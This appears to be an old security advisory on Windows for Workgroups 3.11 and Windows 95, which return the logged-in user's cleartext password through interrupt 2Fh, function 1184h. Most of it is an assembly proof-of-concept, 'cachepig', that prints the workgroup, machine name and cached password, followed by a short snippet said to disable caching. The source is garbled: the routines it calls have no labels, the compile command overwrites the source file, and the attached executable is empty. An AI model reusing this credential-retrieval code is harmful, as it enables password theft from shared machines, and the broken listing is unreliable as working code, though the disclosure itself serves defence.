

    WfW 3.x, Win9x


    'bt398' found  following.   With net.exe,  a user  can set  up the
    network drivers (Windows For Workgroup protocol); moreover, a user
    can log in (open a wfw session) and also change his password.   As
    this program runs on DOS, question is how next.exe retrieving  the
    password of the  user; as no  DLL calls to  undocumented functions
    are possible, only a  call to a special  interrupt/function should
    be used.

    When a  user changes  its password,  net.exe accesses  to the  old
    password using the multiplex interrupt 2fh (or so-called  software
    interrupt) with function 11h (sub function 84h).  'bt398'  suppose
    that function 11XX, int 2fh is installed by the windows kernel  so
    that it can exchange data (WFW  infos) with a DOS program.   Well,
    so you would say that this function requires as input the password
    and returns an error if the password is bad.. but, no..  Microsoft
    did it the other way.  The function returns the uncrypted password
    to a buffer (... no comment).  Indeed, this is not _big_ deal  but
    if a user has access to your computer after you logged then he can
    easily retrieve  your password..   A lot  of people  uses the same
    password  for  their  mail  and  their  windows password (so it is
    somewhat  a  security  problem).   Below  is  a small program that
    prompts the password of the user (you must have logged in  first);
    this only work on Windows for Workgroup 3.11 and Windows 95.
    You'll find source and exe (mimed):

    ; Netscape got the cached cow.. so Microsoft got the cached pig.
    ; caching password in memory is not a good thing to do (security talking):
    ;         mov   ax, 1184h          ; 3 +
    ;         mov   bl, 0eh            ; 2 +
    ;         mov   cx, 0fh            ; 3 +
    ;         mov   di, ans_password   ; 3 +
    ;         int   2fh                ; 2 = 13 bytes
    ; compile : nasm -f bin -o cachepig.asm

    bits 16                                         ; 640 Kb addressing mode
    org  0x100                                      ; good old .COM file

    DOS  EQU 21h
    MPLX EQU 2fh                                    ; multiplex int

    section .text

            mov     dx, banner
            Call    Display

            mov     bl, 05h
            mov     di, ans_workgroup
            Call    Get_Infos
            mov     di, str_workgroup
            mov     dx, di
            Call    Make_Str
            Call    Display

            mov     bl, 03h
            mov     di, ans_login
            Call    Get_Infos
            mov     di, str_login
            mov     dx, di
            Call    Make_Str
            Call    Display

            mov     bl, 0eh
            mov     di, ans_password
            Call    Get_Infos
            mov     di, str_password
            mov     dx, di
            Call    Make_Str
            Call    Display

            mov ax,4C00h
            int DOS

            mov     ah, 09h
            int     DOS

            mov     cx, 12+64-4
            xor     al, al
            repne   scasb
            mov     dword [es:di-1], 00240a0dh

            mov     ax, 1184h
            mov     cx, 0fh                         ; Only needed for bl=0eh
            int     MPLX                            ; it's max length of password

    section .data

    banner        db 'cachepig - ga <>', 0dh, 0ah, 0dh, 0ah, 24h
    str_workgroup db 'workgroup : '
    ans_workgroup times 64 db 0h
    str_login     db 'login     : '
    ans_login     times 64 db 0h
    str_password  db 'password  : '
    ans_password  times 64 db 0h

    And the executable:

    Content-Type: application/octet-stream; name=""
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename=""
    Content-MD5: Td3SC1M0FnjOqWAcoi+GJQ==



    Btw, "login" returned by cachepig is not the login name _but_  the
    computer's name. Anyway, "login" name can be easily retrieved.


    Windows NT are not affected.  Following code seems to disable  the
    password caching feature:

        mov ax, 1184h
        mov bx, 0dh
        xor  cx, cx
        int   2fh